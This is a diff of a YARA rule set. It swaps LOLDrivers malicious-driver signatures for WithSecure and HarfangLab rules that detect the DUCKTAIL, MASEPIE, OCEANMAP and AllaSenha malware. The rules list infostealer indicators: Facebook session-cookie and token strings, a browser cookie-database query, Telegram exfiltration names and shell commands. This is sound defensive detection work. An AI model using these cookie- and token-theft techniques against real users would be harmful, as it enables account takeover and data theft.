-		$ = { 00460069006c0065004400650073006300720069007000740069006f006e[1-8]005000430049006500200056006900640065006f00200043006100700074007500720065 }
-		$ = { 0043006f006d00700061006e0079004e0061006d0065[1-8]004c006500670061006c00200043006f00720070002e }
-		$ = { 00460069006c006500560065007200730069006f006e[1-8]0031002e0030002e0030002e00310035 }
-		$ = { 00500072006f006400750063007400560065007200730069006f006e[1-8]0031002e0030002e0030002e00310035 }
-		$ = { 00500072006f0064007500630074004e0061006d0065[1-8]0050004300490020004500780070007200650073007300200056006900640065006f00200043006100700074007500720065 }
-		$ = { 004f0072006900670069006e0061006c00460069006c0065006e0061006d0065[1-8]005000630069006500430075006200650064002e007300790073 }
-		$ = { 004c006500670061006c0043006f0070007900720069006700680074[1-8]00320030003100360020004c006500670061006c }
+		$dotnet_core_bundle_signature = { 8B 12 02 B9 6A 61 20 38 72 7B 93 02 14 D7 A0 32 13 F5 B9 E6 EF AE 33 18 EE 3B 2D CE 24 B3 6A AE }
+		$fb_str_1 = "c_user" wide ascii
+		$fb_str_2 = "https://business.facebook.com/security/twofactor/reauth/enter" wide ascii
+		$fb_str_3 = "https://business.facebook.com/security/twofactor/reauth" wide ascii
+		$fb_str_4 = "mbasic.facebook.com" wide ascii
+		$fb_str_5 = "DTSGInitData\",[],{\"token\":\"" wide ascii
+		$fb_str_6 = "www.facebook.com" wide ascii
+		$fb_str_7 = "m.facebook.com" wide ascii
+		$fb_str_8 = "business.facebook.com" wide ascii
+		$fb_str_9 = "approvals_code=" wide ascii
+		$fb_str_10 = "c_user=" wide ascii
+		$fb_str_11 = "&__a=1&__comet_req=0&fb_dtsg=" wide ascii
+		$fb_str_12 = "&__jssesw=1" wide ascii
+		$fb_str_13 = "approvals_code=" wide ascii
+		$fb_str_14 = "<BmLinks>k__BackingField" wide ascii
+		$fb_str_15 = "set_FbCookies" wide ascii
+		$fb_str_16 = "<AdsAccount>k__BackingField" wide ascii
+		$fb_str_17 = "GetAllFbData" wide ascii
+		$fb_str_18 = "get_account_id" wide ascii
+		$fb_str_19 = "set_BmLinks" wide ascii
+		$fb_str_20 = "GetBmLink" wide ascii
+		$fb_str_21 = "GetBm" wide ascii
+		$fb_str_22 = "ExtractUserId" wide ascii
+		$fb_str_23 = "set_Bussinesses" wide ascii
+		$fb_str_24 = "set_FbData" wide ascii
+		$fb_str_25 = "get_Nguong" wide ascii
+		$fb_str_26 = "ResetCookie" wide ascii
+		$fb_str_27 = "set_UserId" wide ascii
+		$fb_str_28 = "<Nguong>k__BackingField" wide ascii
+		$fb_str_29 = "get_UserId" wide ascii
+		$fb_str_30 = "set_Nguong" wide ascii
+		$fb_str_31 = "AdsBusiness" wide ascii
+		$fb_str_32 = "<FbData>k__BackingField" wide ascii
+		$fb_str_33 = "<FbCookies>k__BackingField" wide ascii
+		$fb_str_34 = "<invite_link>k__BackingField" wide ascii
+		$fb_str_35 = "get_FbData" wide ascii
+		$fb_str_36 = "get_invite_link" wide ascii
+		$fb_str_37 = "get_Bussinesses" wide ascii
+		$fb_str_38 = "GetNguong" wide ascii
+		$fb_str_39 = "set_AdsAccount" wide ascii
+		$fb_str_40 = "set_invite_link" wide ascii
+		$fb_str_41 = "set_AllCookies" wide ascii
+		$fb_str_42 = "get_business" wide ascii
+		$fb_str_43 = "set_business" wide ascii
+		$fb_str_44 = "<Bussinesses>k__BackingField" wide ascii
+		$fb_str_45 = "GetAdsFromToken" wide ascii
+		$fb_str_46 = "get_AdsAccount" wide ascii
+		$fb_str_47 = "get_BmLinks" wide ascii
+		$fb_str_48 = "FbDataScanner" wide ascii
+		$exfil_str_1 = "telegramBotClient_OnUpdate" wide ascii
+		$exfil_str_2 = "telegramHandler" wide ascii
+		$exfil_str_3 = "ZipArchive" wide ascii
+		$exfil_str_4 = "KillItSame" wide ascii
+		$exfil_str_5 = "1.txt" wide ascii
+		$exfil_str_6 = ".zip" wide ascii
+		$exfil_str_7 = "2.txt" wide ascii
+		$browser_str_1 = "GetCookies" wide ascii
+		$browser_str_2 = "get_AllCookies" wide ascii
+		$browser_str_3 = "ChromiumBrowser" wide ascii
+		$browser_str_4 = "myBrowsers" wide ascii
+		$browser_str_5 = "get_CookiePath" wide ascii
+		$browser_str_6 = "ScanFirefox" wide ascii
+		$browser_str_7 = "get_FbCookies" wide ascii
+		$browser_str_8 = "ScanChomium" wide ascii
+		$browser_str_9 = "BrowserScanner" wide ascii
+		$browser_str_10 = "ScanChronium" wide ascii
+		$browser_str_11 = "CookieData" wide ascii
+		$browser_str_12 = "listBrowser" wide ascii
+		$browser_str_13 = "BrowserCookie" wide ascii
+		$browser_str_14 = "<Cookies>k__BackingField" wide ascii
+		$browser_str_15 = "AddCookie" wide ascii
+		$browser_str_16 = "set_CookiePath" wide ascii
+		$browser_str_17 = "Local State" wide ascii
+		$browser_str_18 = "select name, path, expires_utc, is_secure, is_httponly, host_key, encrypted_value  from cookies" wide ascii
+		$browser_str_19 = "Google\\Chrome\\User Data" wide ascii
+		$browser_str_20 = "Microsoft\\Edge\\User Data" wide ascii
+		$browser_str_21 = "Cookies" wide ascii
+		$browser_str_22 = "encrypted_key\":\"" wide ascii
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5A4D and $dotnet_core_bundle_signature and ( ( 7 of ( $fb_str_* ) and ( 7 of ( $browser_str_* ) or 3 of ( $exfil_str_* ) ) ) or ( 7 of ( $browser_str_* ) and 3 of ( $exfil_str_* ) ) )
 }
-rule LOLDRIVERS_MAL_Driver_Windowsrwinddkprovider_Netfiltersys_Windowsrwinddkdriver_2060
+rule WITHSECURELABS_Ducktail_Artifacts : FILE
 {
 	meta:
-		description = "Detects malicious driver mentioned in LOLDrivers project using VersionInfo values from the PE header - driver_206006a1.sys"
-		author = "Florian Roth"
-		id = "3b3135ae-8e40-5eca-a27e-91c62040b95d"
-		date = "2025-03-07"
-		modified = "2025-03-07"
-		reference = "https://github.com/magicsword-io/LOLDrivers"
-		source_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/detections/yara/yara-rules_mal_drivers.yar#L367-L386"
-		license_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/LICENSE"
-		hash = "206006a11f233b9ae876952308f6d60d7a75c80b4d530a3e6146a0b4d8cd3e4f"
-		logic_hash = "e08a60ea78951ad56ce06ae3936ac5e1987d066224f79353e812a067265b5a28"
-		score = 70
-		quality = 80
-		tags = ""
+		description = "Detects artifacts found in files associated to DUCKTAIL malware"
+		author = "WithSecure"
+		id = "937c9688-b74f-5e02-838f-ab6757a8d2a1"
+		date = "2022-07-18"
+		modified = "2022-07-26"
+		reference = "https://labs.withsecure.com/publications/ducktail"
+		source_url = "https://github.com/WithSecureLabs/iocs/blob/a5e50e76f7829cbab219bec94bf1887dea9bb304/DUCKTAIL/ducktail_artifacts.yar#L1-L20"
+		license_url = "https://github.com/WithSecureLabs/iocs/blob/a5e50e76f7829cbab219bec94bf1887dea9bb304/LICENSE"
+		logic_hash = "1daa5e654058c802826b6a306b5bfc9d0c05c4ee54607e94e618a8d409ce74d9"
+		score = 75
+		quality = 75
+		tags = "FILE"
+		version = "1.0"
+		hash1 = "3dbd9e1c3d0fd6358d4adcba04fdfc0b6e8acc49"
+		hash2 = "9370243589327b458486e3f7637779c2a96b4250"
+		hash3 = "b98170b18b906aee771dbd4dbd31e5963a90a50e"
 
 	strings:
-		$ = { 00460069006c0065004400650073006300720069007000740069006f006e[1-8]004e0065007400460069006c007400650072002000530044004b00200057004600500020004400720069007600650072002000280057005000500029 }
-		$ = { 0043006f006d00700061006e0079004e0061006d0065[1-8]00570069006e0064006f007700730020002800520029002000570069006e00200037002000440044004b002000700072006f00760069006400650072 }
-		$ = { 00460069006c006500560065007200730069006f006e[1-8]0031002e0036002e0035002e0037 }
-		$ = { 00500072006f006400750063007400560065007200730069006f006e[1-8]0036002e0032002e0039003200300030002e00320030003500350037 }
-		$ = { 0049006e007400650072006e0061006c004e0061006d0065[1-8]006e0065007400660069006c0074006500720032002e007300790073 }
-		$ = { 00500072006f0064007500630074004e0061006d0065[1-8]00570069006e0064006f007700730020002800520029002000570069006e00200037002000440044004b0020006400720069007600650072 }
-		$ = { 004f0072006900670069006e0061006c00460069006c0065006e0061006d0065[1-8]006e0065007400660069006c0074006500720032002e007300790073 }
-		$ = { 004c006500670061006c0043006f0070007900720069006700680074[1-8]0043006f0070007900720069006700680074002000a90020004e0065007400460069006c00740065007200530044004b002e0063006f006d }
+		$pdb_path_1 = /[a-z]\:\\projects\\(viruttest|virot)\\/i nocase ascii
+		$pdb_path_2 = /[a-z]\:\\users\\ductai\\/i nocase ascii
+		$pdb_path_3 = "\\dataextractor.pdb" nocase ascii
+		$email = "ductai2308@gmail.com" wide ascii
 
 	condition:
-		all of them
+		uint16( 0 ) == 0x5A4D and any of them
 }
-rule LOLDRIVERS_MAL_Driver_Pinchinstechnologycoltd_Rwtkrlsys_Ransomwareterminator_1A74
+
+rule WITHSECURELABS_Ducktail_Nativeaot : FILE
 {
 	meta:
-		description = "Detects malicious driver mentioned in LOLDrivers project using VersionInfo values from the PE header - driver_1a74c2bd.sys"
-		author = "Florian Roth"
-		id = "63f1a594-8549-5b93-97d7-883fdca263f1"
-		date = "2025-03-07"
-		modified = "2025-03-07"
-		reference = "https://github.com/magicsword-io/LOLDrivers"
-		source_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/detections/yara/yara-rules_mal_drivers.yar#L389-L408"
-		license_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/LICENSE"
-		hash = "1a74c2bde0c9a76486657ccb9c79ea87c9891a32cdd4aa15c7542f7c9487a539"
-		logic_hash = "b430f08ecf891aa9f6cfb3bc5278413045f6dddfe70f4ad51ab8ccc218a7a379"
-		score = 70
+		description = "Detects NativeAOT variants of DUCKTAIL malware"
+		author = "WithSecure"
+		id = "1961d3e1-987b-588b-bfc2-8239797cd049"
+		date = "2022-11-17"
+		modified = "2022-11-22"
+		reference = "https://labs.withsecure.com/publications/ducktail_returns"
+		source_url = "https://github.com/WithSecureLabs/iocs/blob/a5e50e76f7829cbab219bec94bf1887dea9bb304/DUCKTAIL/ducktail_nativeaot.yara#L2-L22"
+		license_url = "https://github.com/WithSecureLabs/iocs/blob/a5e50e76f7829cbab219bec94bf1887dea9bb304/LICENSE"
+		logic_hash = "976b28ac45e5a13d4ce900b857e6bd3afc82b65b0235791fd698b762287cd60e"
+		score = 75
+		quality = 75
+		tags = "FILE"
+		version = "1.0"
+		hash1 = "b043e4639f89459cae85161e6fbf73b22470979e"
+		hash2 = "073b092bf949c31628ee20f7458067bbb05fda3a"
+		hash3 = "d1f6b5f9718a2fe9eaac0c1a627228d3f3b86f87"
+
+	condition:
+		uint16( 0 ) == 0x5A4D and filesize > 15MB and ( pe.section_index ( ".managed" ) >= 0 or pe.exports ( "DotNetRuntimeDebugHeader" ) ) and pe.exports ( "SendFile" ) and pe.exports ( "Start" ) and pe.exports ( "Open" )
+}
+/*
+ * YARA Rule Set
+ * Repository Name: HarfangLab
+ * Repository: https://github.com/HarfangLab/iocs
+ * Retrieval Date: 2025-06-15
+ * Git Commit: 1df815f4210f1d26151026cdd9658dbfc262b019
+ * Number of Rules: 23
+ * Skipped: 0 (age), 1 (quality), 0 (score), 0 (importance)
+ *
+ *
+ * LICENSE
+ *
+ * NO LICENSE SET
+ */
+rule HARFANGLAB_Masepie_Campaign_Htmlstarter : FILE
+{
+	meta:
+		description = "Detect Malicious Web page HTML file from CERT-UA#8399"
+		author = "HarfangLab"
+		id = "0cca485c-7941-5760-8c24-d993dcbf376d"
+		date = "2024-01-24"
+		modified = "2025-04-16"
+		reference = "TRR240101;https://cert.gov.ua/article/6276894"
+		source_url = "https://github.com/HarfangLab/iocs/blob/1df815f4210f1d26151026cdd9658dbfc262b019/hl_public_reports_master.yar#L1-L16"
+		license_url = "N/A"
+		hash = "628bc9f4aa71a015ec415d5d7d8cb168359886a231e17ecac2e5664760ee8eba"
+		logic_hash = "d131372c6ad01ae77e5630bae0c0a04ce311718eb1bcf423e6575f3b0ecdba5d"
+		score = 75
 		quality = 80
-		tags = ""
+		tags = "FILE"
+		context = "file"
 
 	strings:
-		$ = { 00460069006c0065004400650073006300720069007000740069006f006e[1-8]005200570054004b0072006c }
-		$ = { 0043006f006d00700061006e0079004e0061006d0065[1-8]00500069006e006300680069006e007300200054006500630068006e006f006c006f0067007900200043006f002e002c004c00740064002e }
-		$ = { 00460069006c006500560065007200730069006f006e[1-8]0031002e0030002e0030002e0031003000300036 }
-		$ = { 00500072006f006400750063007400560065007200730069006f006e[1-8]0031002e0030 }
-		$ = { 0049006e007400650072006e0061006c004e0061006d0065[1-8]005200570054004b0072006c002e007300790073 }
-		$ = { 00500072006f0064007500630074004e0061006d0065[1-8]00520061006e0073006f006d0077006100720065005400650072006d0069006e00610074006f0072 }
-		$ = { 004f0072006900670069006e0061006c00460069006c0065006e0061006d0065[1-8]005200570054004b0072006c002e007300790073 }
-		$ = { 004c006500670061006c0043006f0070007900720069006700680074[1-8]0043006f0070007900720069006700680074002000280043002900200032003000310036002000500069006e006300680069006e007300200054006500630068006e006f006c006f0067007900200043006f002e002c004c00740064002e }
+		$s1 = "<link rel=\"stylesheet\" href=\"a.css\">" ascii wide fullword
+		$s2 = "src=\".\\Capture" ascii wide
 
 	condition:
-		all of them
+		filesize > 600 and filesize < 5KB and ( all of them )
 }
-rule LOLDRIVERS_MAL_Driver_Gmer_Gmersys_Gmer_0052
+rule HARFANGLAB_Masepie_Campaign_Webdavlnk : FILE
 {
 	meta:
-		description = "Detects malicious driver mentioned in LOLDrivers project using VersionInfo values from the PE header - gmer64.sys, superman.sys"
-		author = "Florian Roth"
-		id = "a2197304-4455-52bb-ac73-9218b310bb99"
-		date = "2025-03-07"
-		modified = "2025-03-07"
-		reference = "https://github.com/magicsword-io/LOLDrivers"
-		source_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/detections/yara/yara-rules_mal_drivers.yar#L411-L431"
-		license_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/LICENSE"
-		hash = "0052aa88e42055a2eed5ddd17c3499c692360155e5e031a211edfcef577acce3"
-		hash = "18c909a2b8c5e16821d6ef908f56881aa0ecceeaccb5fa1e54995935fcfd12f7"
-		logic_hash = "1644a972cb9bde33e5e8ec078b0ee67b34b6a298504895f364260b96a453a3ba"
-		score = 70
+		description = "Detect Malicious LNK from CERT-UA#8399"
+		author = "HarfangLab"
+		id = "de7fd592-e733-52d0-af9b-55adf37eaf74"
+		date = "2024-01-24"
+		modified = "2025-04-16"
+		reference = "TRR240101;https://cert.gov.ua/article/6276894"
+		source_url = "https://github.com/HarfangLab/iocs/blob/1df815f4210f1d26151026cdd9658dbfc262b019/hl_public_reports_master.yar#L17-L39"
+		license_url = "N/A"
+		hash = "19d0c55ac466e4188c4370e204808ca0bc02bba480ec641da8190cb8aee92bdc"
+		logic_hash = "26075e47b54404c55f4ca5eb757efa2b1711d919de0ffbfbdf6935e2e4dd3f3d"
+		score = 75
 		quality = 80
-		tags = ""
+		tags = "FILE"
+		context = "file"
 
 	strings:
-		$ = { 00460069006c0065004400650073006300720069007000740069006f006e[1-8]0047004d00450052002000440072006900760065007200200068007400740070003a002f002f007700770077002e0067006d00650072002e006e00650074 }
-		$ = { 0043006f006d00700061006e0079004e0061006d0065[1-8]0047004d00450052 }
-		$ = { 00460069006c006500560065007200730069006f006e[1-8]0032002c00200030002c002000360039003800330020006200750069006c0074002000620079003a002000570069006e00440044004b }
-		$ = { 00500072006f006400750063007400560065007200730069006f006e[1-8]0032002c00200030002c00200036003900380033 }
-		$ = { 0049006e007400650072006e0061006c004e0061006d0065[1-8]0067006d0065007200360034002e007300790073 }
-		$ = { 00500072006f0064007500630074004e0061006d0065[1-8]0047004d00450052 }
-		$ = { 004f0072006900670069006e0061006c00460069006c0065006e0061006d0065[1-8]0067006d0065007200360034002e007300790073 }
-		$ = { 004c006500670061006c0043006f0070007900720069006700680074[1-8]0043006f0070007900720069006700680074002000280043002900200047004d0045005200200032003000300033002d0032003000310033 }
+		$a1 = "[system.Diagnostics.Process]::Start('msedge','http" wide nocase fullword
+		$a2 = "\\Microsoft\\Edge\\Application\\msedge.exe" wide nocase fullword
+		$a3 = "powershell.exe" ascii wide fullword
+		$s1 = "win-j5ggokh35ap" ascii fullword
+		$s2 = "desktop-q0f4sik" ascii fullword
 
 	condition:
-		all of them
+		filesize > 1200 and filesize < 5KB and ( uint16be( 0 ) == 0x4c00 ) and ( ( all of ( $a* ) ) or ( any of ( $s* ) ) )
 }
-rule LOLDRIVERS_MAL_Driver_Pinchinstechnologycoltd_Rwtkrlsys_Ransomwareterminator_930D
+rule HARFANGLAB_Masepie_Campaign_Masepie : FILE
 {
 	meta:
-		description = "Detects malicious driver mentioned in LOLDrivers project using VersionInfo values from the PE header - driver_930da474.sys"
-		author = "Florian Roth"
-		id = "87bff18c-cbd3-5faa-955f-d215b2f58ea0"
-		date = "2025-03-07"
-		modified = "2025-03-07"
-		reference = "https://github.com/magicsword-io/LOLDrivers"
-		source_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/detections/yara/yara-rules_mal_drivers.yar#L434-L453"
-		license_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/LICENSE"
-		hash = "930da474a6d1be97b54f2c81e883e14d62897aa58622e5b040e412bd36cee0a7"
-		logic_hash = "b96ea1d9788320b12743f9a50e9afe4fc8accc4e4867e34ec8b7e5134d5842ed"
-		score = 70
-		quality = 80
-		tags = ""
+		description = "Detect MASEPIE from CERT-UA#8399"
+		author = "HarfangLab"
+		id = "f0a034fa-38d4-5c54-b865-f830f85e245e"
+		date = "2024-01-24"
+		modified = "2025-04-16"
+		reference = "TRR240101;https://cert.gov.ua/article/6276894"
+		source_url = "https://github.com/HarfangLab/iocs/blob/1df815f4210f1d26151026cdd9658dbfc262b019/hl_public_reports_master.yar#L40-L60"
+		license_url = "N/A"
+		hash = "18f891a3737bb53cd1ab451e2140654a376a43b2d75f6695f3133d47a41952b6"
+		logic_hash = "02da8119267978e63e3ee5ecdefb52285718f8875ec64d320f2752460c05588d"
+		score = 75
+		quality = 78
+		tags = "FILE"
+		context = "file"
 
 	strings:
-		$ = { 00460069006c0065004400650073006300720069007000740069006f006e[1-8]005200570054004b0072006c }
-		$ = { 0043006f006d00700061006e0079004e0061006d0065[1-8]00500069006e006300680069006e007300200054006500630068006e006f006c006f0067007900200043006f002e002c004c00740064002e }
-		$ = { 00460069006c006500560065007200730069006f006e[1-8]0031002e0030002e0030002e003800300038 }
-		$ = { 00500072006f006400750063007400560065007200730069006f006e[1-8]0031002e0030 }
-		$ = { 0049006e007400650072006e0061006c004e0061006d0065[1-8]005200570054004b0072006c002e007300790073 }
-		$ = { 00500072006f0064007500630074004e0061006d0065[1-8]00520061006e0073006f006d0077006100720065005400650072006d0069006e00610074006f0072 }
-		$ = { 004f0072006900670069006e0061006c00460069006c0065006e0061006d0065[1-8]005200570054004b0072006c002e007300790073 }
-		$ = { 004c006500670061006c0043006f0070007900720069006700680074[1-8]0043006f0070007900720069006700680074002000280043002900200032003000310036002000500069006e006300680069006e007300200054006500630068006e006f006c006f0067007900200043006f002e002c004c00740064002e }
+		$t1 = "Try it againg" ascii wide fullword
+		$t2 = "{user}{SEPARATOR}{k}" ascii wide fullword
+		$t3 = "Error transporting file" ascii wide fullword
+		$t4 = "check-ok" ascii wide fullword
+		$a1 = ".join(random.SystemRandom().choice(string.ascii_letters + string.digits) for _ in range(16))" ascii wide fullword
+		$a2 = "dec_file_mes(mes, key)" ascii wide fullword
+		$a3 = "os.popen('whoami').read()" ascii wide fullword
 
 	condition:
-		all of them
+		filesize > 2KB and filesize < 15MB and ( 4 of them )
 }
-rule LOLDRIVERS_MAL_Driver_Mimidrv_Mimidrvmimikatz_2FAF
+rule HARFANGLAB_Masepie_Campaign_Oceanmap : FILE
 {
 	meta:
-		description = "Detects malicious driver mentioned in LOLDrivers project using VersionInfo values from the PE header - mimidrv.sys"
-		author = "Florian Roth"
-		id = "0160f2aa-f60f-5590-be0a-6751487eab92"
-		date = "2025-03-07"
-		modified = "2025-03-07"
-		reference = "https://github.com/magicsword-io/LOLDrivers"
-		source_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/detections/yara/yara-rules_mal_drivers.yar#L456-L472"
-		license_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/LICENSE"
-		hash = "2faf95a3405578d0e613c8d88d534aa7233da0a6217ce8475890140ab8fb33c8"
-		logic_hash = "e7b3f0a8f5a91896f7d487a39c622b12fc7488f9f80c80b6b551e7e5f6a67f18"
-		score = 70
-		quality = 80
-		tags = ""
+		description = "Detect OCEANMAP from CERT-UA#8399"
+		author = "HarfangLab"
+		id = "7dcbce01-ab91-56ae-8789-e2e25ba1bf8c"
+		date = "2024-01-24"
+		modified = "2024-01-31"
+		reference = "TRR240101;https://cert.gov.ua/article/6276894"
+		source_url = "https://github.com/HarfangLab/iocs/blob/1df815f4210f1d26151026cdd9658dbfc262b019/hl_public_reports_master.yar#L61-L95"
+		license_url = "N/A"
+		hash = "24fd571600dcc00bf2bb8577c7e4fd67275f7d19d852b909395bebcbb1274e04"
+		logic_hash = "5fe244025f49358b4285e1272489378a46363ae915881dece26691d971aa93f3"
+		score = 75
+		quality = 78
+		tags = "FILE"
+		context = "file"
 
 	strings:
-		$ = { 00500072006f006400750063007400560065007200730069006f006e[1-8]0032002e0030002e0030002e0030 }
-		$ = { 0049006e007400650072006e0061006c004e0061006d0065[1-8]006d0069006d0069006400720076 }
-		$ = { 00500072006f0064007500630074004e0061006d0065[1-8]006d0069006d006900640072007600200028006d0069006d0069006b00610074007a0029 }
-		$ = { 004f0072006900670069006e0061006c00460069006c0065006e0061006d0065[1-8]006d0069006d0069006400720076002e007300790073 }
-		$ = { 004c006500670061006c0043006f0070007900720069006700680074[1-8]0043006f00700079007200690067006800740020002800630029002000320030003000370020002d00200032003000310035002000670065006e00740069006c006b0069007700690020002800420065006e006a0061006d0069006e002000440045004c005000590029 }
+		$dotNet = ".NETFramework,Version" ascii fullword
+		$a1 = "$ SELECT INBOX.Drafts" wide fullword
+		$a2 = "$ SELECT Drafts" wide fullword
+		$a3 = "$ UID SEARCH subject \"" wide fullword
+		$a4 = "$ APPEND INBOX {" wide fullword
+		$a5 = "+FLAGS (\\Deleted)" wide fullword
+		$a6 = "$ EXPUNGE" wide fullword
+		$a7 = "BODY.PEEK[text]" wide fullword
+		$t1 = "change_time" ascii fullword
+		$t2 = "ReplaceBytes" ascii fullword
+		$t3 = "fcreds" ascii fullword
+		$t4 = "screds" ascii fullword
+		$t5 = "r_creds" ascii fullword
+		$t6 = "comp_id" ascii fullword
+		$t7 = "changesecond" wide fullword
+		$t8 = "taskkill /F /PID" wide fullword
+		$t9 = "cmd.exe" wide fullword
 
 	condition:
-		all of them
+		filesize > 8KB and filesize < 100KB and ( uint16be( 0 ) == 0x4D5A ) and $dotNet and ( 3 of ( $a* ) ) and ( 2 of ( $t* ) )
 }
-rule LOLDRIVERS_MAL_Driver_Pinchinstechnologycoltd_Rwtkrlsys_Ransomwareterminator_146B
+rule HARFANGLAB_Allasenhamaycampaign_Executorloader
 {
 	meta:
-		description = "Detects malicious driver mentioned in LOLDrivers project using VersionInfo values from the PE header - driver_146b8f4f.sys"
-		author = "Florian Roth"
-		id = "47f0ff39-4726-5c66-90a8-981cbd53d2d1"
-		date = "2025-03-07"
-		modified = "2025-03-07"
-		reference = "https://github.com/magicsword-io/LOLDrivers"
-		source_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/detections/yara/yara-rules_mal_drivers.yar#L475-L494"
-		license_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/LICENSE"
-		hash = "146b8f4fc91a4915e8f6aa6e0d871f7161a809c46760ef602bab534836142436"
-		logic_hash = "25a4fec1795204ef5e6dec0f1f7f50f21362fc5105489ae387a7358446d4927c"
-		score = 70
-		quality = 80
+		description = "Detects Delphi ExecutorLoader DLLs and executables."
+		author = "HarfangLab"
+		id = "0a09414d-cd86-54a4-99e4-121a7df7624b"
+		date = "2024-05-28"
+		modified = "2025-04-16"
+		reference = "TRR240501"
+		source_url = "https://github.com/HarfangLab/iocs/blob/1df815f4210f1d26151026cdd9658dbfc262b019/hl_public_reports_master.yar#L96-L114"
+		license_url = "N/A"
+		logic_hash = "61aa0bf180574856e57d0b26442bfa6f4b1e25844611d6eadaed529e1bb86625"
+		score = 75
+		quality = 55
 		tags = ""
+		context = "file,memory"
 
 	strings:
-		$ = { 00460069006c0065004400650073006300720069007000740069006f006e[1-8]005200570054004b0072006c }
-		$ = { 0043006f006d00700061006e0079004e0061006d0065[1-8]00500069006e006300680069006e007300200054006500630068006e006f006c006f0067007900200043006f002e002c004c00740064002e }
-		$ = { 00460069006c006500560065007200730069006f006e[1-8]0030002e0031002e0030002e003200350031 }
-		$ = { 00500072006f006400750063007400560065007200730069006f006e[1-8]0030002e0038 }
-		$ = { 0049006e007400650072006e0061006c004e0061006d0065[1-8]005200570054004b0072006c002e007300790073 }
-		$ = { 00500072006f0064007500630074004e0061006d0065[1-8]00520061006e0073006f006d0077006100720065005400650072006d0069006e00610074006f0072 }
-		$ = { 004f0072006900670069006e0061006c00460069006c0065006e0061006d0065[1-8]005200570054004b0072006c002e007300790073 }
-		$ = { 004c006500670061006c0043006f0070007900720069006700680074[1-8]0043006f0070007900720069006700680074002000280043002900200032003000310036002000500069006e006300680069006e007300200054006500630068006e006f006c006f0067007900200043006f002e002c004c00740064002e }
+		$delphi = "Embarcadero Delphi" ascii fullword
+		$s1 = "\\SysWOW64\\mshta.exe" wide fullword
+		$s2 = "\\System32\\mshta.exe" wide fullword
+		$s3 = "RcDll" wide fullword
+		$default1 = "Default_" wide fullword
+		$default2 = "Default~" wide fullword
 
 	condition:
-		all of them
+		$delphi and all of ( $s* ) and any of ( $default* )
 }
-rule LOLDRIVERS_MAL_Driver_Gentilkiwibenjamindelpy_Mimidrv_Mimidrvmimikatz_2FD4
+rule HARFANGLAB_Allasenhamaycampaign_Allasenha
 {
 	meta:
-		description = "Detects malicious driver mentioned in LOLDrivers project using VersionInfo values from the PE header - mimidrv.sys"
-		author = "Florian Roth"
-		id = "e77f1fc7-4700-5afe-908f-b0d206757365"
-		date = "2025-03-07"
-		modified = "2025-03-07"
-		reference = "https://github.com/magicsword-io/LOLDrivers"
-		source_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/detections/yara/yara-rules_mal_drivers.yar#L497-L518"
-		license_url = "https://github.com/magicsword-io/LOLDrivers//blob/e2e48f15a0885e8b2ad2fb81255089845f5c183c/LICENSE"
-		hash = "2fd43a749b5040ebfafd7cdbd088e27ef44341d121f313515ebde460bf3aaa21"
-		hash = "7824931e55249a501074a258b4f65cd66157ee35672ba17d1c0209f5b0384a28"
-		hash = "28f5aa194a384680a08c0467e94a8fc40f8b0f3f2ac5deb42e0f51a80d27b553"
-		logic_hash = "e24fab351505faf86bd12d6dd97662542c8cf5fca09d916b716af1478f3c9ddf"
-		score = 70
+		description = "Detects AllaSenha banking trojan DLLs."
+		author = "HarfangLab"
+		id = "787c4e66-2053-5f14-a52e-6b0415700e8c"
+		date = "2024-05-28"
+		modified = "2025-04-16"
+		reference = "TRR240501"
+		source_url = "https://github.com/HarfangLab/iocs/blob/1df815f4210f1d26151026cdd9658dbfc262b019/hl_public_reports_master.yar#L115-L137"
+		license_url = "N/A"
+		logic_hash = "affe75ade6c8d9eeba00006f78678a48b1cfc5ffa9f9675fdea6ffd6cb3a02bd"
+		score = 75
 		quality = 80
 		tags = ""
+		context = "file,memory"
 
 	strings:
-		$ = { 00460069006c0065004400650073006300720069007000740069006f006e[1-8]006d0069006d006900640072007600200066006f0072002000570069006e0064006f0077007300200028006d0069006d0069006b00610074007a0029 }
-		$ = { 0043006f006d00700061006e0079004e0061006d0065[1-8]00670065006e00740069006c006b0069007700690020002800420065006e006a0061006d0069006e002000440045004c005000590029 }
-		$ = { 00460069006c006500560065007200730069006f006e[1-8]0032002e0030002e0030002e0030 }
-		$ = { 00500072006f006400750063007400560065007200730069006f006e[1-8]0032002e0030002e0030002e0030 }
-		$ = { 0049006e007400650072006e0061006c004e0061006d0065[1-8]006d0069006d0069006400720076 }
-		$ = { 00500072006f0064007500630074004e0061006d0065[1-8]006d0069006d006900640072007600200028006d0069006d0069006b00610074007a0029 }
-		$ = { 004f0072006900670069006e0061006c00460069006c0065006e0061006d0065[1-8]006d0069006d0069006400720076002e007300790073 }
-		$ = { 004c006500670061006c0043006f0070007900720069006700680074[1-8]0043006f00700079007200690067006800740020002800630029002000320030003000370020002d00200032003000310035002000670065006e00740069006c006b0069007700690020002800420065006e006a0061006d0069006e002000440045004c005000590029 }
+		$a1 = "<|NOSenha|>" wide fullword
+		$a2 = "<|SENHA|>QrCode: " wide fullword
+		$a3 = "<|SENHA|>Senha 6 : " wide fullword
+		$a4 = "<|SENHA|>Snh: " wide fullword
+		$a5 = "<|SENHA|>Token: " wide fullword
